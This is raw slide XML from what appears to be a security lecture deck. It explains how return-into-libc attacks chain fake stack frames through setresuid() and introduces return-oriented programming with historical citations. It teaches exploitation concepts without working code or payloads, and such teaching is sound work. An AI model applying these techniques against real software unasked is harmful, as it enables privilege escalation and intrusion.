            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="44482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8" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="25432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9" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="34513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00" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255"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01" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255"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11402" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255"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11403" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255"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11404" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2550083"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05" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="25432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06" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="25432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07" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="25432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08" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="25432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09" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="44482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0" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="2800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 (ptr to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211411" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2571827" y="3257551"/>
            <a:ext cx="1677763" cy="1015663"/>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after returning from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>() and before</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>jumping to an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211412" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6658055" y="2800350"/>
            <a:ext cx="0" cy="1543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3" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4753055" y="2800350"/>
            <a:ext cx="0" cy="1543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4" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="66580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5" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="47530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6" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="56611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17" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055"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18" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055"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11419" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055"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11420" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055"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11421" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055"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22" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="47530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23" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="47530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24" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="47530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25" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="47530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26" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="66580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28" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4829255" y="3257550"/>
            <a:ext cx="1531188"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When epilogue is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>called, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> points to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211429" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8867855" y="1657350"/>
            <a:ext cx="0" cy="2686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0" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6962855" y="1657350"/>
            <a:ext cx="0" cy="2686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1" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="88678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2" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="69628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3" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="78709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38" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6962855"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39" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="69628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40" name="Rectangle 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="69628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41" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="69628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42" name="Line 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="69628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43" name="Line 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="88678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44" name="Text Box 52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7039055" y="1943100"/>
            <a:ext cx="1535772" cy="1015663"/>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Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>moves to fake2 and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>the parameters are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>“popped”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268542"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68" name="Line 88"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="363542"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69" name="Line 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268542"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70" name="Line 90"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="363542"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71" name="Rectangle 91"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1271592"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72" name="Rectangle 94"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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73" name="Rectangle 95"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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74" name="Rectangle 96"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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75" name="Rectangle 97"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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76" name="Rectangle 98"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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77" name="Rectangle 99"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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78" name="Rectangle 100"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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79" name="Rectangle 101"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542"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80" name="Line 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="363542"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81" name="Line 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268542"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82" name="Rectangle 104"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="2800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saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="439743" y="3257551"/>
            <a:ext cx="1623912" cy="830997"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>before returning from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>() to an </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="84" name="Group 83"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="29240" y="2800497"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="Right Arrow 84"/>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6"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7" name="Group 86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="29240" y="4229247"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Right Arrow 8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0" name="Group 89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2205703" y="2514747"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Right Arrow 90"/>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2"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3" name="Group 92"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4378403" y="1314450"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Right Arrow 93"/>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5"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96" name="Group 95"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4416503" y="1414074"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="Right Arrow 96"/>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8"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9" name="Group 98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6626465" y="160736"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Right Arrow 99"/>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1"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102" name="Group 101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6618527" y="1085850"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="Right Arrow 102"/>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4"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105" name="Group 104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2201308" y="1380317"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="Right Arrow 105"/>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7"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371839657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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> approach can be generalized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of invoking whole functions, one can invoke just a snippet of code, followed by a ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This technique was first introduced in 2005 to work around 64-bit architectures that require parameters to be passed using registers (the “borrowed chunks” technique, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Krahmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4800600"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>223</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281496234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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Later, a more general ROP technique was proposed, which supports loops and conditionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From: “The Geometry of Innocent Flesh on the Bone: Return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without Function Calls (on the x86)”, by </a:t>
            </a:r>
            <a:r>
